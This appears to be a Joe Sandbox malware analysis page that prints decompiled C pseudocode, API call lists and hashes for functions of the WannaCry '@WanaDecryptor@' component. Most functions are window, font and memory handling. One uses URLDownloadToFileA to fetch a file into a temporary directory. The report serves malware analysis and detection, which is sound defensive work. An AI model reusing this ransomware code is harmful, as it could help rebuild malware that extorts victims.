                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                  • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                  0x004044c0
                                  0x004044ca
                                  0x004044cc
                                  0x004044f8
                                  0x00404503
                                  0x0040450d
                                  0x00404513
                                  0x00404519
                                  0x0040451d
                                  0x00404522
                                  0x00000000
                                  0x00404522
                                  0x004044d2
                                  0x004044d8
                                  0x004044d9
                                  0x004044e8
                                  0x004044ee
                                  0x004044ef
                                  0x004044f6
                                  0x00000000
                                  0x00000000
                                  0x0040452a

                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  • Opcode ID: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                  • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                  • Opcode Fuzzy Hash: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                  • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t75;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_t65 =  *0x422210; // 0xb7d178
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_t69 =  *0x422210; // 0xb7d178
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							_t70 =  *0x422210; // 0xb7d178
							 *((intOrPtr*)( *_t70 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							_t73 =  *0x422210; // 0xb7d178
							 *((intOrPtr*)( *_t73 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						_t75 =  *0x422210; // 0xb7d178
						 *((intOrPtr*)( *_t75 + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}
















                                  0x0040c066
                                  0x0040c068
                                  0x0040c073
                                  0x0040c07a
                                  0x0040c07f
                                  0x0040c08b
                                  0x0040c0a2
                                  0x0040c0ad
                                  0x0040c0b2
                                  0x0040c0b5
                                  0x0040c0ba
                                  0x0040c0bf
                                  0x0040c0e7
                                  0x0040c0f6
                                  0x0040c102
                                  0x0040c102
                                  0x0040c111
                                  0x0040c116
                                  0x0040c11c
                                  0x0040c129
                                  0x0040c139
                                  0x0040c13a
                                  0x0040c142
                                  0x0040c17d
                                  0x0040c189
                                  0x0040c189
                                  0x0040c18b
                                  0x0040c195
                                  0x0040c19d
                                  0x0040c19e
                                  0x0040c1ac
                                  0x0040c1b2
                                  0x0040c1ed
                                  0x0040c1ef
                                  0x0040c1ef
                                  0x0040c1f3
                                  0x0040c1fe
                                  0x0040c1fe
                                  0x0040c200
                                  0x0040c208
                                  0x0040c20b
                                  0x00000000
                                  0x0040c1b4
                                  0x0040c1b6
                                  0x0040c1c2
                                  0x0040c1c2
                                  0x0040c1c4
                                  0x0040c1cc
                                  0x0040c1d3
                                  0x0040c1e3
                                  0x0040c1e3
                                  0x0040c144
                                  0x0040c146
                                  0x0040c152
                                  0x0040c152
                                  0x0040c154
                                  0x0040c15c
                                  0x0040c163
                                  0x0040c173
                                  0x0040c173
                                  0x0040c0c1
                                  0x0040c0c1
                                  0x0040c0ca
                                  0x0040c0d5
                                  0x0040c0d5
                                  0x0040c0db
                                  0x0040c216
                                  0x0040c21a
                                  0x0040c21f
                                  0x0040c21f
                                  0x0040c22b
                                  0x0040c238

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
                                  • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                  • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                  0x00409c25
                                  0x00409c27
                                  0x00409c2c
                                  0x00409c34
                                  0x00409c4a
                                  0x00409c4b
                                  0x00409c4e
                                  0x00409c59
                                  0x00409c98
                                  0x00409c9c
                                  0x00409c5b
                                  0x00409c5b
                                  0x00409c68
                                  0x00409c6e
                                  0x00409c72
                                  0x00409c76
                                  0x00409c78
                                  0x00409c7b
                                  0x00409c84
                                  0x00409c86
                                  0x00409c86
                                  0x00409c84
                                  0x00409c8d
                                  0x00409c94
                                  0x00409c94
                                  0x00409ca0
                                  0x00409ca3
                                  0x00409ca8
                                  0x00409ce6
                                  0x00409cf0
                                  0x00409cf0
                                  0x00409caa
                                  0x00409cb2
                                  0x00409cb6
                                  0x00409cb8
                                  0x00409cb8
                                  0x00409cc0
                                  0x00409cc2
                                  0x00409cd4
                                  0x00409cd9
                                  0x00409cdd
                                  0x00409cc4
                                  0x00409cc4
                                  0x00409cc6
                                  0x00409ccd
                                  0x00409ccd
                                  0x00409cc2
                                  0x00409cf9
                                  0x00409cff
                                  0x00409d03
                                  0x00409d06
                                  0x00409d08
                                  0x00409d08
                                  0x00409d24
                                  0x00409d2f
                                  0x00409c37
                                  0x00409c3d
                                  0x00409c3d

                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                  0x004127e0
                                  0x004127e2
                                  0x004127e7
                                  0x004127ed
                                  0x004127ee
                                  0x004127f5
                                  0x004127f8
                                  0x004127fd
                                  0x00412802
                                  0x00412804
                                  0x00412807
                                  0x0041280b
                                  0x0041280f
                                  0x00412813
                                  0x0041287d
                                  0x00412815
                                  0x00412816
                                  0x0041281c
                                  0x0041281e
                                  0x00412825
                                  0x0041282f
                                  0x00412835
                                  0x0041283b
                                  0x00412844
                                  0x00412846
                                  0x00412848
                                  0x00412849
                                  0x0041285a
                                  0x00412860
                                  0x00412862
                                  0x00412868
                                  0x0041286c
                                  0x00412876
                                  0x00412876
                                  0x00412878
                                  0x00412878
                                  0x0041287a
                                  0x0041288b
                                  0x0041288c
                                  0x0041288d
                                  0x00412890
                                  0x00412898
                                  0x0041289f
                                  0x004128a4
                                  0x004128f8
                                  0x004128fa
                                  0x00412906
                                  0x0041290c
                                  0x00412911
                                  0x0041291b
                                  0x004128a6
                                  0x004128a8
                                  0x004128aa
                                  0x004128b2
                                  0x004128b4
                                  0x004128b5
                                  0x004128ba
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128cd
                                  0x004128ce
                                  0x004128d3
                                  0x004128d3
                                  0x004128d6
                                  0x004128d7
                                  0x004128dd
                                  0x004128e2
                                  0x004128e2
                                  0x004128ed
                                  0x004128f7
                                  0x004128f7

                                  APIs
                                  • #823.MFC42(00000244,?,0019FA30,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68filenetworkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}













                                  0x0040b780
                                  0x0040b787
                                  0x0040b793
                                  0x0040b799
                                  0x0040b7a7
                                  0x0040b7ac
                                  0x0040b81d
                                  0x0040b826
                                  0x0040b7ae
                                  0x0040b7ae
                                  0x0040b7b8
                                  0x0040b7c2
                                  0x0040b7c8
                                  0x0040b7d3
                                  0x0040b7d4
                                  0x0040b7db
                                  0x0040b7e1
                                  0x0040b7e7
                                  0x0040b7e9
                                  0x0040b7ea
                                  0x0040b7eb
                                  0x0040b7ed
                                  0x0040b7f4
                                  0x0040b815
                                  0x00000000
                                  0x0040b827
                                  0x0040b82c
                                  0x0040b83d
                                  0x0040b83d
                                  0x0040b7f4

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,0019FA30), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}














                                  0x00409a4e
                                  0x00409a5d
                                  0x00409a65
                                  0x00409a73
                                  0x00409a82
                                  0x00409a9b
                                  0x00409ac0
                                  0x00409acc
                                  0x00409ad7
                                  0x00409ae4
                                  0x00409aeb
                                  0x00409af0
                                  0x00409afc
                                  0x00409b04
                                  0x00409b0e
                                  0x00409b18

                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
